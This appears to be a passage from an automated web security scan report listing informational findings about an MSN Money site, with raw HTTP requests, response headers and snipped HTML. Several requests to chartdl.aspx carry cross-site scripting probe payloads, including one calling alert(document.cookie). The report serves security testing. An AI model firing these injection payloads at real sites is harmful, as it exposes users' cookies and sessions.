The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /investor/StockRating/srstopstocksresults.aspx?sco=1 HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 18:03:58 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-FRAME-OPTIONS: DENY
X-Content-Type-Options: nosniff
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 55915


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<meta http-e
...[SNIP]...
<meta http-equiv="Content-Type" content="text/html;charset=utf-8" /><link rel="search" type="application/opensearchdescription+xml" title="Live Search" href="http://www.live.com/live/search/search.xml" /><script type="text/javascript" src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.4.2.min.js"></script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/beta/0909/MicrosoftAjaxTemplates.js"></script>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections &amp; Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li id="hotmail" class="flyout noscript">
                   <a href="http://mail.live.com" class="flytrigger unreadcount" target="_top">Hotmail</a>
...[SNIP]...
<li><a href="http://mail.live.com/?rru=inbox" target="_top">Inbox</a>
...[SNIP]...
<li><a href="http://calendar.live.com" target="_top">Calendar</a>
...[SNIP]...
<li><a href="http://mail.live.com/?rru=contacts" target="_top">Contacts</a>
...[SNIP]...
<li><a href="http://mail.live.com/?rru=compose" target="_top">Send e-mail</a>
...[SNIP]...
<li id="messenger"><a href="http://explore.live.com/windows-live-messenger" target="_top">Messenger</a>
...[SNIP]...
<li class="last"><a href="http://bing.com" target="_top">Bing</a>
...[SNIP]...
<li class="first">
                   <a id="hplink" href="http://myhomemsn.com" target="_top">Make MSN your homepage</a>
                   <a id="binglink" href="http://www.bing.com/customizeBrowser">Make Bing your decision engine</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search" target="_top">Web</a>
...[SNIP]...
<li class="last noscript"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296410638&amp;rver=5.5.4177.0&amp;wp=MBI&amp;wreply=http://redacted/pploggedin.aspx?Page=http://moneycentral.msn.com/investor/StockRating/srstopstocksresults.aspx&Query=sco=1&amp;lc=1033&amp;id=229" target="_top">Sign in</a>
...[SNIP]...
<li class="flyout"><a class="flytrigger" href="https://secure.bundle.com/msn">My Money</a>
...[SNIP]...
<p>Fundamental company data and historical chart data provided by <a href="http://www.reuters.com/" target="_top">Thomson Reuters</a> (<a href="http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm" target="_top">click for restrictions</a>). Real-time quotes provided by <a href="http://batstrading.com/" target="_top">BATS Exchange</a>. Real-time index quotes and delayed quotes supplied by <a href="http://www.interactivedata-rts.com/" target="_top">Interactive Data Real-Time Services</a>. Fund summary, fund performance and dividend data provided by <a href="http://www.morningstar.com/" target="_top">Morningstar Inc</a>. Analyst recommendations provided by <a href="http://www.zacks.com/" target="_top">Zacks Investment Research</a>. IPO data provided by <a href="http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml" target="_top">Hoover's Inc</a>. Index membership data provided by <a href="http://www.telekurs.com/tkfich_index/tkhoch_home.htm" target="_top">SIX Telekurs</a>
...[SNIP]...
<p>Japanese stock price data provided by <a href="http://www.nri.co.jp/english/" target="_top">Nomura Research Institute Ltd.</a>; quotes delayed 20 minutes. Canadian fund data provided by <a href="http://www.cannex.com/" target="_top">CANNEX Financial Exchanges Ltd</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170" target="_top">Privacy</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn" target="_top">Advertise</a>
...[SNIP]...
<!-- A02:65.54.150.52:01/30/2011 10:03:58 --><img src="http://switch.atdmt.com/action/MSN_enUS_Money" height="1" width="1" border="0" alt="" /><div style="display:none">
...[SNIP]...
<noscript><img src="http://msnportalmoney.112.2O7.net/b/ss/msnportalmoney/1/H.1--NS/0" height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...

22.215. http://redacted/investor/StockRating/srstopstocksresults.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://moneycentral.msn.com
Path:   /investor/StockRating/srstopstocksresults.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /investor/StockRating/srstopstocksresults.aspx?sco=1 HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:13:30 GMT
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
Server: TK2MCWBA01
X-AspNet-Version: 2.0.50727
X-FRAME-OPTIONS: DENY
X-Content-Type-Options: nosniff
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 55922


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<meta http-e
...[SNIP]...
<meta http-equiv="Content-Type" content="text/html;charset=utf-8" /><link rel="search" type="application/opensearchdescription+xml" title="Live Search" href="http://www.live.com/live/search/search.xml" /><script type="text/javascript" src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.4.2.min.js"></script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/beta/0909/MicrosoftAjaxTemplates.js"></script>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections &amp; Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li id="hotmail" class="flyout noscript">
                   <a href="http://mail.live.com" class="flytrigger unreadcount" target="_top">Hotmail</a>
...[SNIP]...
<li><a href="http://mail.live.com/?rru=inbox" target="_top">Inbox</a>
...[SNIP]...
<li><a href="http://calendar.live.com" target="_top">Calendar</a>
...[SNIP]...
<li><a href="http://mail.live.com/?rru=contacts" target="_top">Contacts</a>
...[SNIP]...
<li><a href="http://mail.live.com/?rru=compose" target="_top">Send e-mail</a>
...[SNIP]...
<li id="messenger"><a href="http://explore.live.com/windows-live-messenger" target="_top">Messenger</a>
...[SNIP]...
<li class="last"><a href="http://bing.com" target="_top">Bing</a>
...[SNIP]...
<li class="first">
                   <a id="hplink" href="http://myhomemsn.com" target="_top">Make MSN your homepage</a>
                   <a id="binglink" href="http://www.bing.com/customizeBrowser">Make Bing your decision engine</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search" target="_top">Web</a>
...[SNIP]...
<li class="last noscript"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296353610&amp;rver=5.5.4177.0&amp;wp=MBI&amp;wreply=http://redacted/pploggedin.aspx?Page=http://moneycentral.msn.com/investor/StockRating/srstopstocksresults.aspx&Query=sco=1&amp;lc=1033&amp;id=229" target="_top">Sign in</a>
...[SNIP]...
<li class="flyout"><a class="flytrigger" href="https://secure.bundle.com/msn">My Money</a>
...[SNIP]...
<p>Fundamental company data and historical chart data provided by <a href="http://www.reuters.com/" target="_top">Thomson Reuters</a> (<a href="http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm" target="_top">click for restrictions</a>). Real-time quotes provided by <a href="http://batstrading.com/" target="_top">BATS Exchange</a>. Real-time index quotes and delayed quotes supplied by <a href="http://www.interactivedata-rts.com/" target="_top">Interactive Data Real-Time Services</a>. Fund summary, fund performance and dividend data provided by <a href="http://www.morningstar.com/" target="_top">Morningstar Inc</a>. Analyst recommendations provided by <a href="http://www.zacks.com/" target="_top">Zacks Investment Research</a>. IPO data provided by <a href="http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml" target="_top">Hoover's Inc</a>. Index membership data provided by <a href="http://www.telekurs.com/tkfich_index/tkhoch_home.htm" target="_top">SIX Telekurs</a>
...[SNIP]...
<p>Japanese stock price data provided by <a href="http://www.nri.co.jp/english/" target="_top">Nomura Research Institute Ltd.</a>; quotes delayed 20 minutes. Canadian fund data provided by <a href="http://www.cannex.com/" target="_top">CANNEX Financial Exchanges Ltd</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170" target="_top">Privacy</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn" target="_top">Advertise</a>
...[SNIP]...
<!-- A01:65.54.150.51:01/29/2011 18:13:30 --><img src="http://switch.atdmt.com/action/MSN_enUS_Money" height="1" width="1" border="0" alt="" /><div style="display:none">
...[SNIP]...
<noscript><img src="http://msnportalmoney.112.2O7.net/b/ss/msnportalmoney/1/H.1--NS/0" height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...

22.216. http://redacted/investor/charts/chartdl.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://moneycentral.msn.com
Path:   /investor/charts/chartdl.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(1)//2badde9cef5 HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://investing.money.redacted/investments/charts?Symbol=indu22b72%22%3balert(1)//2badde9cef5
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D; userCh=4=1&8=0&20=0

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Sun, 30 Jan 2011 13:00:43 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-FRAME-OPTIONS: DENY
X-Content-Type-Options: nosniff
Vary: Accept-Encoding
Content-Length: 24731


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<meta http-e
...[SNIP]...
<meta http-equiv="Content-Type" content="text/html;charset=utf-8" /><link rel="search" type="application/opensearchdescription+xml" title="Live Search" href="http://www.live.com/live/search/search.xml" /><script type="text/javascript" src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.4.2.min.js"></script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/beta/0909/MicrosoftAjaxTemplates.js"></script>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections &amp; Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li id="hotmail" class="flyout noscript">
                   <a href="http://mail.live.com" class="flytrigger unreadcount" target="_top">Hotmail</a>
...[SNIP]...
<li><a href="http://mail.live.com/?rru=inbox" target="_top">Inbox</a>
...[SNIP]...
<li><a href="http://calendar.live.com" target="_top">Calendar</a>
...[SNIP]...
<li><a href="http://mail.live.com/?rru=contacts" target="_top">Contacts</a>
...[SNIP]...
<li><a href="http://mail.live.com/?rru=compose" target="_top">Send e-mail</a>
...[SNIP]...
<li id="messenger"><a href="http://explore.live.com/windows-live-messenger" target="_top">Messenger</a>
...[SNIP]...
<li class="last"><a href="http://bing.com" target="_top">Bing</a>
...[SNIP]...
<li class="first">
                   <a id="hplink" href="http://myhomemsn.com" target="_top">Make MSN your homepage</a>
                   <a id="binglink" href="http://www.bing.com/customizeBrowser">Make Bing your decision engine</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search" target="_top">Web</a>
...[SNIP]...
<li class="last noscript"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296392443&amp;rver=5.5.4177.0&amp;wp=MBI&amp;wreply=http://redacted/pploggedin.aspx?Page=http://moneycentral.msn.com/investor/charts/chartdl.aspx&Query=symbol=indu22b72%2522%253balert(1)%252f%252f2badde9cef5&amp;lc=1033&amp;id=229" target="_top">Sign in</a>
...[SNIP]...
<li class="flyout"><a class="flytrigger" href="https://secure.bundle.com/msn">My Money</a>
...[SNIP]...
<p>Fundamental company data and historical chart data provided by <a href="http://www.reuters.com/" target="_top">Thomson Reuters</a> (<a href="http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm" target="_top">click for restrictions</a>). Real-time quotes provided by <a href="http://batstrading.com/" target="_top">BATS Exchange</a>. Real-time index quotes and delayed quotes supplied by <a href="http://www.interactivedata-rts.com/" target="_top">Interactive Data Real-Time Services</a>. Fund summary, fund performance and dividend data provided by <a href="http://www.morningstar.com/" target="_top">Morningstar Inc</a>. Analyst recommendations provided by <a href="http://www.zacks.com/" target="_top">Zacks Investment Research</a>. IPO data provided by <a href="http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml" target="_top">Hoover's Inc</a>. Index membership data provided by <a href="http://www.telekurs.com/tkfich_index/tkhoch_home.htm" target="_top">SIX Telekurs</a>
...[SNIP]...
<p>Japanese stock price data provided by <a href="http://www.nri.co.jp/english/" target="_top">Nomura Research Institute Ltd.</a>; quotes delayed 20 minutes. Canadian fund data provided by <a href="http://www.cannex.com/" target="_top">CANNEX Financial Exchanges Ltd</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170" target="_top">Privacy</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn" target="_top">Advertise</a>
...[SNIP]...
<!-- A04:65.54.150.54:01/30/2011 05:00:43 --><img src="http://switch.atdmt.com/action/MSN_enUS_Money" height="1" width="1" border="0" alt="" /><div style="display:none">
...[SNIP]...
<noscript><img src="http://msnportalmoney.112.2O7.net/b/ss/msnportalmoney/1/H.1--NS/0" height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...

22.217. http://redacted/investor/charts/chartdl.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://moneycentral.msn.com
Path:   /investor/charts/chartdl.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5 HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://investing.money.redacted/investments/charts?Symbol=indu22b72%22%3balert(document.cookie)//2badde9cef5
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; userCh=4=0&8=0&20=0; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Sun, 30 Jan 2011 13:00:14 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-FRAME-OPTIONS: DENY
X-Content-Type-Options: nosniff
Vary: Accept-Encoding
Content-Length: 24815


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<meta http-e
...[SNIP]...
<meta http-equiv="Content-Type" content="text/html;charset=utf-8" /><link rel="search" type="application/opensearchdescription+xml" title="Live Search" href="http://www.live.com/live/search/search.xml" /><script type="text/javascript" src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.4.2.min.js"></script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/beta/0909/MicrosoftAjaxTemplates.js"></script>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections &amp; Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li id="hotmail" class="flyout noscript">
                   <a href="http://mail.live.com" class="flytrigger unreadcount" target="_top">Hotmail</a>
...[SNIP]...
<li><a href="http://mail.live.com/?rru=inbox" target="_top">Inbox</a>
...[SNIP]...
<li><a href="http://calendar.live.com" target="_top">Calendar</a>
...[SNIP]...
<li><a href="http://mail.live.com/?rru=contacts" target="_top">Contacts</a>
...[SNIP]...
<li><a href="http://mail.live.com/?rru=compose" target="_top">Send e-mail</a>
...[SNIP]...
<li id="messenger"><a href="http://explore.live.com/windows-live-messenger" target="_top">Messenger</a>
...[SNIP]...
<li class="last"><a href="http://bing.com" target="_top">Bing</a>
...[SNIP]...
<li class="first">
                   <a id="hplink" href="http://myhomemsn.com" target="_top">Make MSN your homepage</a>
                   <a id="binglink" href="http://www.bing.com/customizeBrowser">Make Bing your decision engine</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search" target="_top">Web</a>
...[SNIP]...
<li class="last noscript"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296392414&amp;rver=5.5.4177.0&amp;wp=MBI&amp;wreply=http://redacted/pploggedin.aspx?Page=http://moneycentral.msn.com/investor/charts/chartdl.aspx&Query=symbol=indu22b72%2522%253balert(document.cookie)%252f%252f2badde9cef5&amp;lc=1033&amp;id=229" target="_top">Sign in</a>
...[SNIP]...
<li class="flyout"><a class="flytrigger" href="https://secure.bundle.com/msn">My Money</a>
...[SNIP]...
<p>Fundamental company data and historical chart data provided by <a href="http://www.reuters.com/" target="_top">Thomson Reuters</a> (<a href="http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm" target="_top">click for restrictions</a>). Real-time quotes provided by <a href="http://batstrading.com/" target="_top">BATS Exchange</a>. Real-time index quotes and delayed quotes supplied by <a href="http://www.interactivedata-rts.com/" target="_top">Interactive Data Real-Time Services</a>. Fund summary, fund performance and dividend data provided by <a href="http://www.morningstar.com/" target="_top">Morningstar Inc</a>. Analyst recommendations provided by <a href="http://www.zacks.com/" target="_top">Zacks Investment Research</a>. IPO data provided by <a href="http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml" target="_top">Hoover's Inc</a>. Index membership data provided by <a href="http://www.telekurs.com/tkfich_index/tkhoch_home.htm" target="_top">SIX Telekurs</a>
...[SNIP]...
<p>Japanese stock price data provided by <a href="http://www.nri.co.jp/english/" target="_top">Nomura Research Institute Ltd.</a>; quotes delayed 20 minutes. Canadian fund data provided by <a href="http://www.cannex.com/" target="_top">CANNEX Financial Exchanges Ltd</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170" target="_top">Privacy</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn" target="_top">Advertise</a>
...[SNIP]...
<!-- A02:65.54.150.52:01/30/2011 05:00:14 --><img src="http://switch.atdmt.com/action/MSN_enUS_Money" height="1" width="1" border="0" alt="" /><div style="display:none">
...[SNIP]...
<noscript><img src="http://msnportalmoney.112.2O7.net/b/ss/msnportalmoney/1/H.1--NS/0" height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...

22.218. http://redacted/investor/charts/chartdl.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://moneycentral.msn.com
Path:   /investor/charts/chartdl.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5 HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://investing.money.redacted/investments/charts?Symbol=indu22b72%22%3balert(document.cookie)//2badde9cef5
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; userCh=4=0&8=0&20=0; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Sun, 30 Jan 2011 15:08:15 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-FRAME-OPTIONS: DENY
X-Content-Type-Options: nosniff
Vary: Accept-Encoding
Content-Length: 24815


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<meta http-e
...[SNIP]...
<meta http-equiv="Content-Type" content="text/html;charset=utf-8" /><link rel="search" type="application/opensearchdescription+xml" title="Live Search" href="http://www.live.com/live/search/search.xml" /><script type="text/javascript" src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.4.2.min.js"></script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/beta/0909/MicrosoftAjaxTemplates.js"></script>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections &amp; Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li id="hotmail" class="flyout noscript">
                   <a href="http://mail.live.com" class="flytrigger unreadcount" target="_top">Hotmail</a>
...[SNIP]...
<li><a href="http://mail.live.com/?rru=inbox" target="_top">Inbox</a>
...[SNIP]...
<li><a href="http://calendar.live.com" target="_top">Calendar</a>
...[SNIP]...
<li><a href="http://mail.live.com/?rru=contacts" target="_top">Contacts</a>
...[SNIP]...
<li><a href="http://mail.live.com/?rru=compose" target="_top">Send e-mail</a>
...[SNIP]...
<li id="messenger"><a href="http://explore.live.com/windows-live-messenger" target="_top">Messenger</a>
...[SNIP]...
<li class="last"><a href="http://bing.com" target="_top">Bing</a>
...[SNIP]...
<li class="first">
                   <a id="hplink" href="http://myhomemsn.com" target="_top">Make MSN your homepage</a>
                   <a id="binglink" href="http://www.bing.com/customizeBrowser">Make Bing your decision engine</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search" target="_top">Web</a>
...[SNIP]...
